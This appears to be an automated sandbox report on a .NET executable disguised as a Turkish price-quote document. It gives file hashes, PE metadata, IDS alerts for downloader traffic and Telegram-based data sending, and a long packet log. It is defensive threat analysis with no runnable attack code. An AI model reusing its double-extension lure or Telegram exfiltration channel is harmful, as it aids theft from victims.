                                                                                                    Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2w03rho0.5xq.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rr0nzz4u.1fi.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbxnbfse.lp4.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yn0dnzl5.4hm.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.366240635702084
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    File size:1'082'368 bytes
                                                                                                    MD5:a4a64f5e476f06b0f9258edbe1aef13c
                                                                                                    SHA1:5c1a197a5d7c570c1fba5167e3f7865454fdf7d5
                                                                                                    SHA256:da0407f4df1fb7b5af96c81a21dd905852792693f10fb960930970d53ee1c3f8
                                                                                                    SHA512:f9e449e4019b69ff4a44d3692393c3921b930d90cb3cfb50e92e5545147957da1b003add70a57ad5d24269d052dc3c43d773dafc0bd7690532cbae26fc248009
                                                                                                    SSDEEP:24576:uksj30ivvE/4NGzOhLjvc3yfyF2+oSXiXu:6jki3E/40zOJjU2oesiX
                                                                                                    TLSH:1435F1182A04D047D92AB3348AA6F1B41B343D9EF650D35A5FF9BDBF387DA124C5A603
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+.kg..............0..h............... ........@.. ....................................@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:0133616706060606

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x5086de
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x676BAD2B [Wed Dec 25 06:58:51 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x10868c0x4f.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x1750.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x105b080x54.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x1066e40x1068000b97e9f3055081daf06bb6d73103a6feFalse0.781518787202381data7.382712715601936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x10a0000x17500x1800f22ff50ed90db85cff66c565b6abedceFalse0.2265625data3.1304255482135295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x10c0000xc0x200370929a56f8f4e6d3333a2978e35beebFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0x10a1300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.13813320825515948
                                                                                                    RT_GROUP_ICON0x10b1d80x14data1.1
                                                                                                    RT_VERSION0x10b1ec0x378data0.43243243243243246
                                                                                                    RT_MANIFEST0x10b5640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-09T19:09:34.146606+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702132.226.247.7380TCP
                                                                                                    2025-01-09T19:09:35.146592+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702132.226.247.7380TCP
                                                                                                    2025-01-09T19:09:35.779099+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749705104.21.64.1443TCP
                                                                                                    2025-01-09T19:09:36.631009+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749706132.226.247.7380TCP
                                                                                                    2025-01-09T19:09:45.818402+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749759104.21.64.1443TCP
                                                                                                    2025-01-09T19:09:47.103841+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749760149.154.167.220443TCP
                                                                                                    2025-01-09T19:09:54.886602+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749808149.154.167.220443TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 9, 2025 19:09:33.166275024 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:33.171056986 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:33.171124935 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:33.171355963 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:33.176111937 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:33.873567104 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:33.883658886 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:33.888501883 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.100465059 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.146605968 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:34.156765938 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.156796932 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.156858921 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.165425062 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.165436029 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.642355919 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.642460108 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.648493052 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.648511887 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.648902893 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.693511963 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.739814997 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.787322044 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.849936962 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.850048065 CET44349704104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.850342989 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.856317043 CET49704443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:34.860151052 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:34.865175962 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.103996992 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.106086969 CET49705443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:35.106100082 CET44349705104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.106158018 CET49705443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:35.106441021 CET49705443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:35.106446028 CET44349705104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.146591902 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:35.587928057 CET44349705104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.590286016 CET49705443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:35.590332031 CET44349705104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.779092073 CET44349705104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.779177904 CET44349705104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.779412031 CET49705443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:35.779743910 CET49705443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:35.783390999 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:35.784590006 CET4970680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:35.788840055 CET8049702132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.788898945 CET4970280192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:35.790244102 CET8049706132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:35.790318966 CET4970680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:35.790402889 CET4970680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:35.795496941 CET8049706132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:36.584702015 CET8049706132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:36.586456060 CET49708443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:36.586502075 CET44349708104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:36.586879015 CET49708443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:36.586879969 CET49708443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:36.586920023 CET44349708104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:36.631009102 CET4970680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:37.070719957 CET44349708104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.081929922 CET49708443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:37.081944942 CET44349708104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.207601070 CET44349708104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.207681894 CET44349708104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.207814932 CET49708443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:37.208411932 CET49708443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:37.213167906 CET4971080192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:37.218043089 CET8049710132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.218112946 CET4971080192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:37.218221903 CET4971080192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:37.223022938 CET8049710132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.942362070 CET8049710132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.943662882 CET49712443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:37.943753958 CET44349712104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.943850040 CET49712443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:37.944122076 CET49712443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:37.944150925 CET44349712104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:37.990386009 CET4971080192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:38.468286991 CET44349712104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:38.474256039 CET49712443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:38.474350929 CET44349712104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:38.615489006 CET44349712104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:38.615549088 CET44349712104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:38.615612030 CET49712443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:38.615987062 CET49712443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:38.619637012 CET4971080192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:38.620760918 CET4971880192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:38.624880075 CET8049710132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:38.624946117 CET4971080192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:38.625586987 CET8049718132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:38.625659943 CET4971880192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:38.625767946 CET4971880192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:38.630558014 CET8049718132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.324439049 CET8049718132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.325778008 CET49719443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:39.325820923 CET44349719104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.325915098 CET49719443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:39.326138973 CET49719443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:39.326153040 CET44349719104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.366240978 CET4971880192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:39.803726912 CET44349719104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.805716991 CET49719443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:39.805740118 CET44349719104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.974673033 CET44349719104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.974822998 CET44349719104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.975023985 CET49719443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:39.975636959 CET49719443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:39.978940010 CET4971880192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:39.979888916 CET4972580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:39.983906031 CET8049718132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.983974934 CET4971880192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:39.984643936 CET8049725132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:39.984708071 CET4972580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:39.984846115 CET4972580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:39.989588976 CET8049725132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:40.677221060 CET8049725132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:40.678581953 CET49731443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:40.678632975 CET44349731104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:40.678683043 CET49731443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:40.679032087 CET49731443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:40.679054022 CET44349731104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:40.724816084 CET4972580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:41.154684067 CET44349731104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:41.156263113 CET49731443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:41.156280994 CET44349731104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:41.308568954 CET44349731104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:41.308677912 CET44349731104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:41.308725119 CET49731443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:41.309201956 CET49731443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:41.313070059 CET4972580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:41.314263105 CET4973780192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:41.318034887 CET8049725132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:41.318088055 CET4972580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:41.319052935 CET8049737132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:41.319139004 CET4973780192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:41.319233894 CET4973780192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:41.324240923 CET8049737132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:42.071578979 CET8049737132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:42.072949886 CET49743443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:42.073050022 CET44349743104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:42.073137045 CET49743443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:42.073642015 CET49743443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:42.073674917 CET44349743104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:42.115408897 CET4973780192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:42.787872076 CET44349743104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:42.794620037 CET49743443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:42.794640064 CET44349743104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.057688951 CET44349743104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.057888985 CET44349743104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.058028936 CET49743443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:43.058235884 CET49743443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:43.061885118 CET4973780192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:43.063025951 CET4974680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:43.066838980 CET8049737132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.066911936 CET4973780192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:43.067851067 CET8049746132.226.247.73192.168.2.7
